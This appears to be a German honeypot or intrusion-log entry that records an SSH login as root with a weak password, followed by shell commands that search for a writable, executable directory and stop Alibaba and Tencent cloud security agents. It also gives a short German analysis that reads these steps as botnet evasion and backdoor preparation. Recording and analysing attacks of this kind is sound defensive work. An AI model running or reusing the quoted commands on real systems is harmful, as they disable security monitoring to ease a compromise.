29.09.2026, 15:44 UTC · 16 Befehle · über ssh · Vereinigte Staaten
user='root' pass='12345678Sa' root@srv01:~$ #!/bin/sh root@srv01:~$ wdir="/tmp" root@srv01:~$ for i in "/dev/shm" "/tmp" "/var/tmp" "/home" "/root"; do root@srv01:~$ touch "$i/test_exec" >/dev/null 2>&1 root@srv01:~$ chmod +x "$i/test_exec" >/dev/null 2>&1 root@srv01:~$ if [ -w "$i" ] && [ -x "$i/test_exec" ]; then root@srv01:~$ wdir="$i" root@srv01:~$ rm -f "$i/test_exec" root@srv01:~$ break root@srv01:~$ fi root@srv01:~$ rm -f "$i/test_exec" >/dev/null 2>&1 root@srv01:~$ done root@srv01:~$ cd "$wdir" || exit 1 root@srv01:~$ for svc in aegis aliyun YDService tat_agent; do root@srv01:~$ systemctl stop $svc >/dev/null 2>&1 root@srv01:~$ ls -la /var/run/gcc.pid
Der Angreifer meldete sich mit einem schwachen Passwort als Root-Benutzer an. Er suchte systematisch nach einem beschreibbaren und ausführbaren Verzeichnis im Dateisystem. Anschließend versuchte er, mehrere spezifische Sicherheitsdienste zu stoppen und prüfte das Vorhandensein einer Prozess-ID-Datei.
Das Skript definiert einen temporären Arbeitsordner und testet Schreibrechte in Standardverzeichnissen wie /tmp. Es wählt das erste Verzeichnis aus, in dem Dateien erstellt und ausgeführt werden dürfen. Danach werden Dienste wie aegis, aliyun und YDService gestoppt, was Cloud-Sicherheitsagenten von Alibaba Cloud sind. Der Befehl ls -la listet Details zur Datei gcc.pid auf, um deren Existenz oder Attribute zu prüfen.
Das Vorgehen deutet auf die Vorbereitung einer Persistenz oder die Installation einer Backdoor hin. Das Stoppen von Cloud-Sicherheitsagenten ist ein typischer Schritt, um Erkennung zu vermeiden. Die Prüfung der PID-Datei könnte der Tarnung dienen oder einen bestehenden Prozess identifizieren.
Dieses Muster ist bei automatisierten Botnetzen verbreitet, die Cloud-Server kompromittieren. Die Kombination aus schwachen Passwörtern und dem gezielten Abschalten von Cloud-Agenten ist ein bekanntes Indiz für Skript-basierte Angriffe.